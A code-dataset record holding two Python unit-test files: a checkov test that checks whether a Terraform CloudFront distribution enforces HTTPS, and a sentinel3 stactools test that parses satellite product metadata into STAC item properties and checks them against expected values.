| 0
| 0.08
| 100
| 2
| 51
| 50
| 0.913043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b64d673a9075a980eb8a317c3e54a31a2578b951
| 5,302
|
py
|
Python
|
tests/terraform/checks/resource/aws/test_CloudfrontDistributionEncryption.py
|
fossabot/checkov
|
d09938cffe3588dd1f472bcf2382e07fa7f9010b
|
[
"Apache-2.0"
] | null | null | null |
tests/terraform/checks/resource/aws/test_CloudfrontDistributionEncryption.py
|
fossabot/checkov
|
d09938cffe3588dd1f472bcf2382e07fa7f9010b
|
[
"Apache-2.0"
] | null | null | null |
tests/terraform/checks/resource/aws/test_CloudfrontDistributionEncryption.py
|
fossabot/checkov
|
d09938cffe3588dd1f472bcf2382e07fa7f9010b
|
[
"Apache-2.0"
] | null | null | null |
import unittest
from checkov.terraform.checks.resource.aws.CloudfrontDistributionEncryption import check
from checkov.terraform.models.enums import CheckResult
class TestCloudfrontDistributionEncryption(unittest.TestCase):
    """The encryption check must key off the default cache behavior's viewer protocol policy."""

    @staticmethod
    def _resource_conf(default_viewer_protocol_policy):
        """Build the parsed aws_cloudfront_distribution conf used by both tests.

        The two original tests duplicated this entire dict and differed only in
        the default cache behavior's viewer_protocol_policy, which is the one
        value the check under test inspects — so it is the only parameter.
        """
        return {
            'origin': [{
                'domain_name': ['${aws_s3_bucket.b.bucket_regional_domain_name}'],
                'origin_id': ['${local.s3_origin_id}'],
                's3_origin_config': [
                    {'origin_access_identity': ['origin-access-identity/cloudfront/ABCDEFG1234567']}],
            }],
            'enabled': [True],
            'is_ipv6_enabled': [True],
            'comment': ['Some comment'],
            'default_root_object': ['index.html'],
            'logging_config': [{
                'include_cookies': [False],
                'bucket': ['mylogs.s3.amazonaws.com'],
                'prefix': ['myprefix'],
            }],
            'aliases': [['mysite.example.com', 'yoursite.example.com']],
            'ordered_cache_behavior': [
                {
                    'path_pattern': ['/content/immutable/*'],
                    'allowed_methods': [['GET', 'HEAD', 'OPTIONS']],
                    'cached_methods': [['GET', 'HEAD', 'OPTIONS']],
                    'target_origin_id': ['${local.s3_origin_id}'],
                    'forwarded_values': [{
                        'query_string': [False],
                        'headers': [['Origin']],
                        'cookies': [{'forward': ['none']}],
                    }],
                    'min_ttl': [0],
                    'default_ttl': [86400],
                    'max_ttl': [31536000],
                    'compress': [True],
                    'viewer_protocol_policy': ['redirect-to-https'],
                },
                {
                    'path_pattern': ['/content/*'],
                    'allowed_methods': [['GET', 'HEAD', 'OPTIONS']],
                    'cached_methods': [['GET', 'HEAD']],
                    'target_origin_id': ['${local.s3_origin_id}'],
                    'forwarded_values': [{'query_string': [False], 'cookies': [{'forward': ['none']}]}],
                    'min_ttl': [0],
                    'default_ttl': [3600],
                    'max_ttl': [86400],
                    'compress': [True],
                    'viewer_protocol_policy': ['redirect-to-https'],
                },
            ],
            'price_class': ['PriceClass_200'],
            'restrictions': [{
                'geo_restriction': [
                    {'restriction_type': ['whitelist'], 'locations': [['US', 'CA', 'GB', 'DE']]}],
            }],
            'viewer_certificate': [{'cloudfront_default_certificate': [True]}],
            'default_cache_behavior': [{
                'allowed_methods': [['DELETE', 'GET', 'HEAD', 'OPTIONS', 'PATCH', 'POST', 'PUT']],
                'cached_methods': [['GET', 'HEAD']],
                'target_origin_id': ['${local.s3_origin_id}'],
                'forwarded_values': [{'query_string': [False], 'cookies': [{'forward': ['none']}]}],
                'viewer_protocol_policy': [default_viewer_protocol_policy],
                'min_ttl': [0],
                'default_ttl': [3600],
                'max_ttl': [86400],
            }],
        }

    def test_failure(self):
        # 'allow-all' permits unencrypted viewer traffic -> check must fail.
        resource_conf = self._resource_conf('allow-all')
        scan_result = check.scan_resource_conf(conf=resource_conf)
        self.assertEqual(CheckResult.FAILED, scan_result)

    def test_success(self):
        # 'redirect-to-https' forces encrypted viewer traffic -> check passes.
        resource_conf = self._resource_conf('redirect-to-https')
        scan_result = check.scan_resource_conf(conf=resource_conf)
        self.assertEqual(CheckResult.PASSED, scan_result)
# Allow running this test module directly, outside the pytest/unittest runner.
if __name__ == '__main__':
    unittest.main()
| 76.84058
| 120
| 0.571482
| 514
| 5,302
| 5.575875
| 0.237354
| 0.044662
| 0.048849
| 0.04187
| 0.899163
| 0.899163
| 0.893929
| 0.893929
| 0.893929
| 0.893929
| 0
| 0.024791
| 0.208789
| 5,302
| 68
| 121
| 77.970588
| 0.658403
| 0
| 0
| 0.786885
| 0
| 0
| 0.471897
| 0.136929
| 0
| 0
| 0
| 0
| 0.032787
| 1
| 0.032787
| false
| 0.016393
| 0.04918
| 0
| 0.098361
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fcae2fea7c90f8e608262ad80e03fbd3dea0f22b
| 59,353
|
py
|
Python
|
tests/test_metadata.py
|
chorng/sentinel3
|
7d11f3ff1d001a239f0f14c36dfa3a6b597049ac
|
[
"Apache-2.0"
] | null | null | null |
tests/test_metadata.py
|
chorng/sentinel3
|
7d11f3ff1d001a239f0f14c36dfa3a6b597049ac
|
[
"Apache-2.0"
] | null | null | null |
tests/test_metadata.py
|
chorng/sentinel3
|
7d11f3ff1d001a239f0f14c36dfa3a6b597049ac
|
[
"Apache-2.0"
] | null | null | null |
import unittest
import pystac
from pystac.extensions.eo import EOExtension
from pystac.extensions.projection import ProjectionExtension
from pystac.extensions.sat import SatExtension
from stactools.sentinel3.metadata_links import MetadataLinks
from stactools.sentinel3.product_metadata import ProductMetadata
from stactools.sentinel3.properties import (fill_eo_properties,
fill_proj_properties,
fill_sat_properties)
from tests import test_data
class Sentinel3OLCIMetadataTest(unittest.TestCase):
def test_parses_olci_1_efr_metadata_properties(self):
# Get the path of the test xml
manifest_path = test_data.get_path(
"data-files/"
"S3A_OL_1_EFR____20210820T103153_20210820T103453_20210820T124206_"
"0179_075_222_2160_LN1_O_NR_002.SEN3")
metalinks = MetadataLinks(manifest_path)
product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
item = pystac.Item(
id=product_metadata.scene_id,
geometry=product_metadata.geometry,
bbox=product_metadata.bbox,
datetime=product_metadata.get_datetime,
properties={},
stac_extensions=[],
)
# ---- Add Extensions ----
# sat
sat = SatExtension.ext(item, add_if_missing=True)
fill_sat_properties(sat, metalinks.manifest)
# eo
eo = EOExtension.ext(item, add_if_missing=True)
fill_eo_properties(eo, metalinks.manifest)
# proj
proj = ProjectionExtension.ext(item, add_if_missing=True)
fill_proj_properties(proj, product_metadata)
# s3 properties
item.properties.update({**product_metadata.metadata_dict})
# Make a dictionary of the properties
s3_props = {
"bbox":
item.bbox,
"epsg":
item.properties["proj:epsg"],
"datetime":
item.datetime.strftime("%Y-%m-%dT%H:%M:%S.%fZ"),
"orbit_state":
item.properties["sat:orbit_state"],
"absolute_orbit":
item.properties["sat:absolute_orbit"],
"relative_orbit":
item.properties["sat:relative_orbit"],
"shape":
item.properties["proj:shape"],
"instrument":
item.properties["s3:instrument"],
"mode":
item.properties["s3:mode"],
"productType":
item.properties["s3:productType"],
"salineWaterPixels_percentage":
item.properties["s3:salineWaterPixels_percentage"],
"coastalPixels_percentage":
item.properties["s3:coastalPixels_percentage"],
"freshInlandWaterPixels_percentage":
item.properties["s3:freshInlandWaterPixels_percentage"],
"tidalRegionPixels_percentage":
item.properties["s3:tidalRegionPixels_percentage"],
"brightPixels_percentage":
item.properties["s3:brightPixels_percentage"],
"invalidPixels_percentage":
item.properties["s3:invalidPixels_percentage"],
"cosmeticPixels_percentage":
item.properties["s3:cosmeticPixels_percentage"],
"duplicatedPixels_percentage":
item.properties["s3:duplicatedPixels_percentage"],
"saturatedPixels_percentage":
item.properties["s3:saturatedPixels_percentage"],
"dubiousSamples_percentage":
item.properties["s3:dubiousSamples_percentage"],
}
expected = {
"bbox": [-12.7336, 39.5443, 7.26622, 52.4486],
"epsg": 4326,
"datetime": "2021-08-20T10:33:22.751633Z",
"orbit_state": "descending",
"absolute_orbit": 28685,
"relative_orbit": 222,
"shape": [4865, 4090],
"instrument": "OLCI",
"mode": "EO",
"productType": "OL_1_EFR___",
"salineWaterPixels_percentage": 52.0,
"coastalPixels_percentage": 0.0,
"freshInlandWaterPixels_percentage": 0.0,
"tidalRegionPixels_percentage": 2.0,
"brightPixels_percentage": 45.0,
"invalidPixels_percentage": 4.0,
"cosmeticPixels_percentage": 0.0,
"duplicatedPixels_percentage": 23.0,
"saturatedPixels_percentage": 6e-06,
"dubiousSamples_percentage": 0.0,
}
for k, v in expected.items():
self.assertIn(k, s3_props)
self.assertEqual(s3_props[k], v)
def test_parses_olci_1_err_metadata_properties(self):
# Get the path of the test xml
manifest_path = test_data.get_path(
"data-files/"
"S3B_OL_1_ERR____20210902T054142_20210902T062554_20210903T103126_"
"2652_056_262______LN1_O_NT_002.SEN3")
metalinks = MetadataLinks(manifest_path)
product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
item = pystac.Item(
id=product_metadata.scene_id,
geometry=product_metadata.geometry,
bbox=product_metadata.bbox,
datetime=product_metadata.get_datetime,
properties={},
stac_extensions=[],
)
# ---- Add Extensions ----
# sat
sat = SatExtension.ext(item, add_if_missing=True)
fill_sat_properties(sat, metalinks.manifest)
# eo
eo = EOExtension.ext(item, add_if_missing=True)
fill_eo_properties(eo, metalinks.manifest)
# proj
proj = ProjectionExtension.ext(item, add_if_missing=True)
fill_proj_properties(proj, product_metadata)
# s3 properties
item.properties.update({**product_metadata.metadata_dict})
# Make a dictionary of the properties
s3_props = {
"bbox":
item.bbox,
"epsg":
item.properties["proj:epsg"],
"datetime":
item.datetime.strftime("%Y-%m-%dT%H:%M:%S.%fZ"),
"orbit_state":
item.properties["sat:orbit_state"],
"absolute_orbit":
item.properties["sat:absolute_orbit"],
"relative_orbit":
item.properties["sat:relative_orbit"],
"shape":
item.properties["proj:shape"],
"instrument":
item.properties["s3:instrument"],
"mode":
item.properties["s3:mode"],
"productType":
item.properties["s3:productType"],
"salineWaterPixels_percentage":
item.properties["s3:salineWaterPixels_percentage"],
"coastalPixels_percentage":
item.properties["s3:coastalPixels_percentage"],
"freshInlandWaterPixels_percentage":
item.properties["s3:freshInlandWaterPixels_percentage"],
"tidalRegionPixels_percentage":
item.properties["s3:tidalRegionPixels_percentage"],
"brightPixels_percentage":
item.properties["s3:brightPixels_percentage"],
"invalidPixels_percentage":
item.properties["s3:invalidPixels_percentage"],
"cosmeticPixels_percentage":
item.properties["s3:cosmeticPixels_percentage"],
"duplicatedPixels_percentage":
item.properties["s3:duplicatedPixels_percentage"],
"saturatedPixels_percentage":
item.properties["s3:saturatedPixels_percentage"],
"dubiousSamples_percentage":
item.properties["s3:dubiousSamples_percentage"],
}
expected = {
"bbox": [-179.992, -64.7838, 177.69, 89.2419],
"epsg": 4326,
"datetime": "2021-09-02T06:03:47.955487Z",
"orbit_state": "ascending",
"absolute_orbit": 17474,
"relative_orbit": 262,
"shape": [1217, 15070],
"instrument": "OLCI",
"mode": "EO",
"productType": "OL_1_ERR___",
"salineWaterPixels_percentage": 64.0,
"coastalPixels_percentage": 0.0,
"freshInlandWaterPixels_percentage": 1.0,
"tidalRegionPixels_percentage": 0.0,
"brightPixels_percentage": 37.0,
"invalidPixels_percentage": 3.0,
"cosmeticPixels_percentage": 0.0,
"duplicatedPixels_percentage": 0.0,
"saturatedPixels_percentage": 0.0,
"dubiousSamples_percentage": 0.0,
}
for k, v in expected.items():
self.assertIn(k, s3_props)
self.assertEqual(s3_props[k], v)
def test_parses_olci_2_lfr_metadata_properties(self):
# Get the path of the test xml
manifest_path = test_data.get_path(
"data-files/"
"S3A_OL_2_LFR____20180105T002409_20180105T002540_20180106T053045_"
"0090_026_216_2069_LN1_O_NT_002.SEN3")
metalinks = MetadataLinks(manifest_path)
product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
item = pystac.Item(
id=product_metadata.scene_id,
geometry=product_metadata.geometry,
bbox=product_metadata.bbox,
datetime=product_metadata.get_datetime,
properties={},
stac_extensions=[],
)
# ---- Add Extensions ----
# sat
sat = SatExtension.ext(item, add_if_missing=True)
fill_sat_properties(sat, metalinks.manifest)
# eo
eo = EOExtension.ext(item, add_if_missing=True)
fill_eo_properties(eo, metalinks.manifest)
# proj
proj = ProjectionExtension.ext(item, add_if_missing=True)
fill_proj_properties(proj, product_metadata)
# s3 properties
item.properties.update({**product_metadata.metadata_dict})
# Make a dictionary of the properties
s3_props = {
"bbox":
item.bbox,
"epsg":
item.properties["proj:epsg"],
"datetime":
item.datetime.strftime("%Y-%m-%dT%H:%M:%S.%fZ"),
"orbit_state":
item.properties["sat:orbit_state"],
"absolute_orbit":
item.properties["sat:absolute_orbit"],
"relative_orbit":
item.properties["sat:relative_orbit"],
"cloud_cover":
item.properties["eo:cloud_cover"],
"shape":
item.properties["proj:shape"],
"instrument":
item.properties["s3:instrument"],
"mode":
item.properties["s3:mode"],
"productType":
item.properties["s3:productType"],
"salineWaterPixels_percentage":
item.properties["s3:salineWaterPixels_percentage"],
"coastalPixels_percentage":
item.properties["s3:coastalPixels_percentage"],
"freshInlandWaterPixels_percentage":
item.properties["s3:freshInlandWaterPixels_percentage"],
"tidalRegionPixels_percentage":
item.properties["s3:tidalRegionPixels_percentage"],
"landPixels_percentage":
item.properties["s3:landPixels_percentage"],
"invalidPixels_percentage":
item.properties["s3:invalidPixels_percentage"],
"cosmeticPixels_percentage":
item.properties["s3:cosmeticPixels_percentage"],
"duplicatedPixels_percentage":
item.properties["s3:duplicatedPixels_percentage"],
"saturatedPixels_percentage":
item.properties["s3:saturatedPixels_percentage"],
"dubiousSamples_percentage":
item.properties["s3:dubiousSamples_percentage"],
}
expected = {
"bbox": [140.405, 50.1222, 162.085, 57.9697],
"epsg": 4326,
"datetime": "2018-01-05T00:24:54.153465Z",
"orbit_state": "descending",
"absolute_orbit": 9814,
"relative_orbit": 216,
"cloud_cover": 71.0,
"shape": [4865, 2062],
"instrument": "OLCI",
"mode": "EO",
"productType": "OL_2_LFR___",
"salineWaterPixels_percentage": 13.0,
"coastalPixels_percentage": 0.002661,
"freshInlandWaterPixels_percentage": 0.0,
"tidalRegionPixels_percentage": 1.0,
"landPixels_percentage": 0.0,
"invalidPixels_percentage": 4.0,
"cosmeticPixels_percentage": 0.0,
"duplicatedPixels_percentage": 0.808174,
"saturatedPixels_percentage": 0.0,
"dubiousSamples_percentage": 0.0,
}
for k, v in expected.items():
self.assertIn(k, s3_props)
self.assertEqual(s3_props[k], v)
def test_parses_olci_2_lrr_metadata_properties(self):
# Get the path of the test xml
manifest_path = test_data.get_path(
"data-files/"
"S3B_OL_2_LRR____20210902T054142_20210902T062554_20210903T103456_"
"2652_056_262______LN1_O_NT_002.SEN3")
metalinks = MetadataLinks(manifest_path)
product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
item = pystac.Item(
id=product_metadata.scene_id,
geometry=product_metadata.geometry,
bbox=product_metadata.bbox,
datetime=product_metadata.get_datetime,
properties={},
stac_extensions=[],
)
# ---- Add Extensions ----
# sat
sat = SatExtension.ext(item, add_if_missing=True)
fill_sat_properties(sat, metalinks.manifest)
# eo
eo = EOExtension.ext(item, add_if_missing=True)
fill_eo_properties(eo, metalinks.manifest)
# proj
proj = ProjectionExtension.ext(item, add_if_missing=True)
fill_proj_properties(proj, product_metadata)
# s3 properties
item.properties.update({**product_metadata.metadata_dict})
# Make a dictionary of the properties
s3_props = {
"bbox":
item.bbox,
"epsg":
item.properties["proj:epsg"],
"datetime":
item.datetime.strftime("%Y-%m-%dT%H:%M:%S.%fZ"),
"orbit_state":
item.properties["sat:orbit_state"],
"absolute_orbit":
item.properties["sat:absolute_orbit"],
"relative_orbit":
item.properties["sat:relative_orbit"],
"cloud_cover":
item.properties["eo:cloud_cover"],
"shape":
item.properties["proj:shape"],
"instrument":
item.properties["s3:instrument"],
"mode":
item.properties["s3:mode"],
"productType":
item.properties["s3:productType"],
"salineWaterPixels_percentage":
item.properties["s3:salineWaterPixels_percentage"],
"coastalPixels_percentage":
item.properties["s3:coastalPixels_percentage"],
"freshInlandWaterPixels_percentage":
item.properties["s3:freshInlandWaterPixels_percentage"],
"tidalRegionPixels_percentage":
item.properties["s3:tidalRegionPixels_percentage"],
"landPixels_percentage":
item.properties["s3:landPixels_percentage"],
"invalidPixels_percentage":
item.properties["s3:invalidPixels_percentage"],
"cosmeticPixels_percentage":
item.properties["s3:cosmeticPixels_percentage"],
"duplicatedPixels_percentage":
item.properties["s3:duplicatedPixels_percentage"],
"saturatedPixels_percentage":
item.properties["s3:saturatedPixels_percentage"],
"dubiousSamples_percentage":
item.properties["s3:dubiousSamples_percentage"],
}
expected = {
"bbox": [-179.992, -64.7838, 177.69, 89.2419],
"epsg": 4326,
"datetime": "2021-09-02T06:03:47.955487Z",
"orbit_state": "ascending",
"absolute_orbit": 17474,
"relative_orbit": 262,
"cloud_cover": 42.0,
"shape": [1217, 15070],
"instrument": "OLCI",
"mode": "EO",
"productType": "OL_2_LRR___",
"salineWaterPixels_percentage": 29.0,
"coastalPixels_percentage": 0.218855,
"freshInlandWaterPixels_percentage": 1.0,
"tidalRegionPixels_percentage": 0.0,
"landPixels_percentage": 24.0,
"invalidPixels_percentage": 3.0,
"cosmeticPixels_percentage": 0.0,
"duplicatedPixels_percentage": 0.0,
"saturatedPixels_percentage": 0.0,
"dubiousSamples_percentage": 0.0,
}
for k, v in expected.items():
self.assertIn(k, s3_props)
self.assertEqual(s3_props[k], v)
def test_parses_olci_2_wfr_metadata_properties(self):
# Get the path of the test xml
manifest_path = test_data.get_path(
"data-files/"
"S3A_OL_2_WFR____20201006T012547_20201006T012847_20201007T100122_"
"0180_063_302_3060_MAR_O_NT_002.SEN3")
metalinks = MetadataLinks(manifest_path)
product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
item = pystac.Item(
id=product_metadata.scene_id,
geometry=product_metadata.geometry,
bbox=product_metadata.bbox,
datetime=product_metadata.get_datetime,
properties={},
stac_extensions=[],
)
# ---- Add Extensions ----
# sat
sat = SatExtension.ext(item, add_if_missing=True)
fill_sat_properties(sat, metalinks.manifest)
# eo
eo = EOExtension.ext(item, add_if_missing=True)
fill_eo_properties(eo, metalinks.manifest)
# proj
proj = ProjectionExtension.ext(item, add_if_missing=True)
fill_proj_properties(proj, product_metadata)
# s3 properties
item.properties.update({**product_metadata.metadata_dict})
# Make a dictionary of the properties
s3_props = {
"bbox":
item.bbox,
"epsg":
item.properties["proj:epsg"],
"datetime":
item.datetime.strftime("%Y-%m-%dT%H:%M:%S.%fZ"),
"orbit_state":
item.properties["sat:orbit_state"],
"absolute_orbit":
item.properties["sat:absolute_orbit"],
"relative_orbit":
item.properties["sat:relative_orbit"],
"cloud_cover":
item.properties["eo:cloud_cover"],
"shape":
item.properties["proj:shape"],
"instrument":
item.properties["s3:instrument"],
"mode":
item.properties["s3:mode"],
"productType":
item.properties["s3:productType"],
"salineWaterPixels_percentage":
item.properties["s3:salineWaterPixels_percentage"],
"coastalPixels_percentage":
item.properties["s3:coastalPixels_percentage"],
"freshInlandWaterPixels_percentage":
item.properties["s3:freshInlandWaterPixels_percentage"],
"tidalRegionPixels_percentage":
item.properties["s3:tidalRegionPixels_percentage"],
"landPixels_percentage":
item.properties["s3:landPixels_percentage"],
"invalidPixels_percentage":
item.properties["s3:invalidPixels_percentage"],
"cosmeticPixels_percentage":
item.properties["s3:cosmeticPixels_percentage"],
"duplicatedPixels_percentage":
item.properties["s3:duplicatedPixels_percentage"],
"saturatedPixels_percentage":
item.properties["s3:saturatedPixels_percentage"],
"dubiousSamples_percentage":
item.properties["s3:dubiousSamples_percentage"],
}
expected = {
"bbox": [117.198, -13.3386, 131.246, -0.122527],
"epsg": 4326,
"datetime": "2020-10-06T01:27:17.328426Z",
"orbit_state": "descending",
"absolute_orbit": 24145,
"relative_orbit": 302,
"cloud_cover": 51.0,
"shape": [4865, 4091],
"instrument": "OLCI",
"mode": "EO",
"productType": "OL_2_WFR___",
"salineWaterPixels_percentage": 41.0,
"coastalPixels_percentage": 0.010557,
"freshInlandWaterPixels_percentage": 0.0,
"tidalRegionPixels_percentage": 2.0,
"landPixels_percentage": 5.0,
"invalidPixels_percentage": 4.0,
"cosmeticPixels_percentage": 0.0,
"duplicatedPixels_percentage": 1.570717,
"saturatedPixels_percentage": 0.0,
"dubiousSamples_percentage": 2.0,
}
for k, v in expected.items():
self.assertIn(k, s3_props)
self.assertEqual(s3_props[k], v)
def test_parses_slstr_1_rbt_metadata_properties(self):
# Get the path of the test xml
manifest_path = test_data.get_path(
"data-files/"
"S3A_SL_1_RBT____20210827T074336_20210827T074636_20210827T094954_"
"0179_075_320_3060_LN2_O_NR_004.SEN3")
metalinks = MetadataLinks(manifest_path)
product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
item = pystac.Item(
id=product_metadata.scene_id,
geometry=product_metadata.geometry,
bbox=product_metadata.bbox,
datetime=product_metadata.get_datetime,
properties={},
stac_extensions=[],
)
# ---- Add Extensions ----
# sat
sat = SatExtension.ext(item, add_if_missing=True)
fill_sat_properties(sat, metalinks.manifest)
# eo
eo = EOExtension.ext(item, add_if_missing=True)
fill_eo_properties(eo, metalinks.manifest)
# proj
proj = ProjectionExtension.ext(item, add_if_missing=True)
fill_proj_properties(proj, product_metadata)
# s3 properties
item.properties.update({**product_metadata.metadata_dict})
# Make a dictionary of the properties
s3_props = {
"bbox":
item.bbox,
"epsg":
item.properties["proj:epsg"],
"datetime":
item.datetime.strftime("%Y-%m-%dT%H:%M:%S.%fZ"),
"orbit_state":
item.properties["sat:orbit_state"],
"absolute_orbit":
item.properties["sat:absolute_orbit"],
"relative_orbit":
item.properties["sat:relative_orbit"],
"cloud_cover":
item.properties["eo:cloud_cover"],
"shape":
item.properties["proj:shape"],
"instrument":
item.properties["s3:instrument"],
"mode":
item.properties["s3:mode"],
"productType":
item.properties["s3:productType"],
"salineWaterPixels_percentage":
item.properties["s3:salineWaterPixels_percentage"],
"landPixels_percentage":
item.properties["s3:landPixels_percentage"],
"coastalPixels_percentage":
item.properties["s3:coastalPixels_percentage"],
"freshInlandWaterPixels_percentage":
item.properties["s3:freshInlandWaterPixels_percentage"],
"tidalRegionPixels_percentage":
item.properties["s3:tidalRegionPixels_percentage"],
"cosmeticPixels_percentage":
item.properties["s3:cosmeticPixels_percentage"],
"duplicatedPixels_percentage":
item.properties["s3:duplicatedPixels_percentage"],
"saturatedPixels_percentage":
item.properties["s3:saturatedPixels_percentage"],
"outOfRangePixels_percentage":
item.properties["s3:outOfRangePixels_percentage"],
}
expected = {
"bbox": [22.5729, -13.6378, 38.2488, -0.086826],
"epsg": 4326,
"datetime": "2021-08-27T07:45:05.980881Z",
"orbit_state": "descending",
"absolute_orbit": 28783,
"relative_orbit": 320,
"cloud_cover": 12.909653,
"shape": [1500, 1200],
"instrument": "SLSTR",
"mode": "EO",
"productType": "SL_1_RBT___",
"salineWaterPixels_percentage": 0.0,
"landPixels_percentage": 100.0,
"coastalPixels_percentage": 0.0,
"freshInlandWaterPixels_percentage": 6.677569,
"tidalRegionPixels_percentage": 0.0,
"cosmeticPixels_percentage": 27.02875,
"duplicatedPixels_percentage": 5.058438,
"saturatedPixels_percentage": 0.0,
"outOfRangePixels_percentage": 14.225087,
}
for k, v in expected.items():
self.assertIn(k, s3_props)
self.assertEqual(s3_props[k], v)
def test_parses_slstr_2_frp_metadata_properties(self):
# Get the path of the test xml
manifest_path = test_data.get_path(
"data-files/"
"S3A_SL_2_FRP____20201104T001225_20201104T001525_20201105T060455_"
"0179_064_330_1800_LN2_O_NT_004.SEN3")
metalinks = MetadataLinks(manifest_path)
product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
item = pystac.Item(
id=product_metadata.scene_id,
geometry=product_metadata.geometry,
bbox=product_metadata.bbox,
datetime=product_metadata.get_datetime,
properties={},
stac_extensions=[],
)
# ---- Add Extensions ----
# sat
sat = SatExtension.ext(item, add_if_missing=True)
fill_sat_properties(sat, metalinks.manifest)
# eo
eo = EOExtension.ext(item, add_if_missing=True)
fill_eo_properties(eo, metalinks.manifest)
# proj
proj = ProjectionExtension.ext(item, add_if_missing=True)
fill_proj_properties(proj, product_metadata)
# s3 properties
item.properties.update({**product_metadata.metadata_dict})
# Make a dictionary of the properties
s3_props = {
"bbox":
item.bbox,
"epsg":
item.properties["proj:epsg"],
"datetime":
item.datetime.strftime("%Y-%m-%dT%H:%M:%S.%fZ"),
"orbit_state":
item.properties["sat:orbit_state"],
"absolute_orbit":
item.properties["sat:absolute_orbit"],
"relative_orbit":
item.properties["sat:relative_orbit"],
"cloud_cover":
item.properties["eo:cloud_cover"],
"shape":
item.properties["proj:shape"],
"instrument":
item.properties["s3:instrument"],
"mode":
item.properties["s3:mode"],
"productType":
item.properties["s3:productType"],
"salineWaterPixels_percentage":
item.properties["s3:salineWaterPixels_percentage"],
"landPixels_percentage":
item.properties["s3:landPixels_percentage"],
"coastalPixels_percentage":
item.properties["s3:coastalPixels_percentage"],
"freshInlandWaterPixels_percentage":
item.properties["s3:freshInlandWaterPixels_percentage"],
"tidalRegionPixels_percentage":
item.properties["s3:tidalRegionPixels_percentage"],
"cosmeticPixels_percentage":
item.properties["s3:cosmeticPixels_percentage"],
"duplicatedPixels_percentage":
item.properties["s3:duplicatedPixels_percentage"],
"saturatedPixels_percentage":
item.properties["s3:saturatedPixels_percentage"],
"outOfRangePixels_percentage":
item.properties["s3:outOfRangePixels_percentage"],
}
expected = {
"bbox": [-179.696, 59.3275, 179.51, 73.3617],
"epsg": 4326,
"datetime": "2020-11-04T00:13:54.939130Z",
"orbit_state": "descending",
"absolute_orbit": 24558,
"relative_orbit": 330,
"cloud_cover": 90.616444,
"shape": [1500, 1200],
"instrument": "SLSTR",
"mode": "EO",
"productType": "SL_2_FRP___",
"salineWaterPixels_percentage": 16.259833,
"landPixels_percentage": 83.740167,
"coastalPixels_percentage": 0.110222,
"freshInlandWaterPixels_percentage": 2.344778,
"tidalRegionPixels_percentage": 0.256222,
"cosmeticPixels_percentage": 22.062722,
"duplicatedPixels_percentage": 5.217167,
"saturatedPixels_percentage": 0.0,
"outOfRangePixels_percentage": 0.182278,
}
for k, v in expected.items():
self.assertIn(k, s3_props)
self.assertEqual(s3_props[k], v)
def test_parses_slstr_2_lst_metadata_properties(self):
# Get the path of the test xml
manifest_path = test_data.get_path(
"data-files/"
"S3A_SL_2_LST____20180104T004105_20180104T022205_20180930T071122_"
"6059_026_202______LR1_R_NT_003.SEN3")
metalinks = MetadataLinks(manifest_path)
product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
item = pystac.Item(
id=product_metadata.scene_id,
geometry=product_metadata.geometry,
bbox=product_metadata.bbox,
datetime=product_metadata.get_datetime,
properties={},
stac_extensions=[],
)
# ---- Add Extensions ----
# sat
sat = SatExtension.ext(item, add_if_missing=True)
fill_sat_properties(sat, metalinks.manifest)
# eo
eo = EOExtension.ext(item, add_if_missing=True)
fill_eo_properties(eo, metalinks.manifest)
# proj
proj = ProjectionExtension.ext(item, add_if_missing=True)
fill_proj_properties(proj, product_metadata)
# s3 properties
item.properties.update({**product_metadata.metadata_dict})
# Make a dictionary of the properties
s3_props = {
"bbox":
item.bbox,
"epsg":
item.properties["proj:epsg"],
"datetime":
item.datetime.strftime("%Y-%m-%dT%H:%M:%S.%fZ"),
"orbit_state":
item.properties["sat:orbit_state"],
"absolute_orbit":
item.properties["sat:absolute_orbit"],
"relative_orbit":
item.properties["sat:relative_orbit"],
"cloud_cover":
item.properties["eo:cloud_cover"],
"shape":
item.properties["proj:shape"],
"instrument":
item.properties["s3:instrument"],
"mode":
item.properties["s3:mode"],
"productType":
item.properties["s3:productType"],
"salineWaterPixels_percentage":
item.properties["s3:salineWaterPixels_percentage"],
"landPixels_percentage":
item.properties["s3:landPixels_percentage"],
"coastalPixels_percentage":
item.properties["s3:coastalPixels_percentage"],
"freshInlandWaterPixels_percentage":
item.properties["s3:freshInlandWaterPixels_percentage"],
"tidalRegionPixels_percentage":
item.properties["s3:tidalRegionPixels_percentage"],
"cosmeticPixels_percentage":
item.properties["s3:cosmeticPixels_percentage"],
"duplicatedPixels_percentage":
item.properties["s3:duplicatedPixels_percentage"],
"saturatedPixels_percentage":
item.properties["s3:saturatedPixels_percentage"],
"outOfRangePixels_percentage":
item.properties["s3:outOfRangePixels_percentage"],
}
expected = {
"bbox": [-178.494, -85.7857, 176.014, 89.8585],
"epsg": 4326,
"datetime": "2018-01-04T01:31:35.029797Z",
"orbit_state": "ascending",
"absolute_orbit": 9800,
"relative_orbit": 202,
"cloud_cover": 73.828503,
"shape": [1500, 40396],
"instrument": "SLSTR",
"mode": "EO",
"productType": "SL_2_LST___",
"salineWaterPixels_percentage": 63.373017,
"landPixels_percentage": 36.626983,
"coastalPixels_percentage": 0.125689,
"freshInlandWaterPixels_percentage": 0.818881,
"tidalRegionPixels_percentage": 0.642805,
"cosmeticPixels_percentage": 23.04911,
"duplicatedPixels_percentage": 5.590684,
"saturatedPixels_percentage": 0.0,
"outOfRangePixels_percentage": 0.0,
}
